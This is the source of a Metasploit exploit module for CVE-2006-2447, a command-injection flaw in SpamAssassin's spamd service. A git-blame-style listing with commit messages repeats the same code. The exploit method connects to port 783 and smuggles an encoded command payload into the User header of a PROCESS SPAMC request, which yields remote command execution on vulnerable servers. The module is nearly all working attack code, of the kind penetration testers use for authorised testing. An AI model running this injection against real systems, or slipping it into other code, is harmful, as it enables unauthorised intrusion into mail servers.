metasploit-framework/modules/exploits/unix/misc/spamassassin_exec.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SpamAssassin spamd Remote Command Execution',
			'Description'    => %q{
					This module exploits a flaw in the SpamAssassin spamd service by specifying
				a malicious vpopmail User header, when running with vpopmail and paranoid
				modes enabled (non-default). Versions prior to v3.1.3 are vulnerable
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-2447' ],
					[ 'OSVDB', '26177' ],
					[ 'BID', '18290' ],
					[ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					[ 'Automatic', { }],
				],
			'DisclosureDate' => 'Jun 06 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(783)
			], self.class)
	end

	def exploit
		connect

		content = Rex::Text.rand_text_alpha(20)

		sploit = "PROCESS SPAMC/1.2\r\n"
		sploit << "Content-length: #{(content.length + 2)}\r\n"
		sploit << "User: ;#{payload.encoded}\r\n\r\n"
		sploit << content + "\r\n\r\n"

		sock.put(sploit)

		handler
		disconnect
	end

end
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00			`##`

			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = ExcellentRanking`
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'SpamAssassin spamd Remote Command Execution',`
			`'Description' => %q{`
			`This module exploits a flaw in the SpamAssassin spamd service by specifying`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`a malicious vpopmail User header, when running with vpopmail and paranoid`
			`modes enabled (non-default). Versions prior to v3.1.3 are vulnerable`
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00			`},`
			`'Author' => [ 'patrick' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'CVE', '2006-2447' ],`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules git-svn-id: file:///home/svn/framework3/trunk@6907 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-27 14:05:23 +00:00			`[ 'OSVDB', '26177' ],`
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00			`[ 'BID', '18290' ],`
			`[ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Space' => 1024,`
Added a new set of match flags for cmd injection exploits (RequiredCmds). This reduces the number of 'bad' payloads listed for explot modules. A good example is disabling the netcat -e payloads for old Solaris exploits git-svn-id: file:///home/svn/framework3/trunk@6854 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-21 15:20:35 +00:00			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic perl ruby bash telnet',`
			`}`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`},`
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'Targets' =>`
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00			`[`
			`[ 'Automatic', { }],`
			`],`
			`'DisclosureDate' => 'Jun 06 2006',`
			`'DefaultTarget' => 0))`

big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`register_options(`
Added spamassassin_exec module. git-svn-id: file:///home/svn/framework3/trunk@5560 4d416f70-5f16-0410-b530-b9f4589650da 2008-07-19 15:40:30 +00:00			`[`
			`Opt::RPORT(783)`
			`], self.class)`
			`end`

			`def exploit`
			`connect`

			`content = Rex::Text.rand_text_alpha(20)`

			`sploit = "PROCESS SPAMC/1.2\r\n"`
			`sploit << "Content-length: #{(content.length + 2)}\r\n"`
			`sploit << "User: ;#{payload.encoded}\r\n\r\n"`
			`sploit << content + "\r\n\r\n"`

			`sock.put(sploit)`

			`handler`
			`disconnect`
			`end`

Added a new set of match flags for cmd injection exploits (RequiredCmds). This reduces the number of 'bad' payloads listed for explot modules. A good example is disabling the netcat -e payloads for old Solaris exploits git-svn-id: file:///home/svn/framework3/trunk@6854 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-21 15:20:35 +00:00			`end`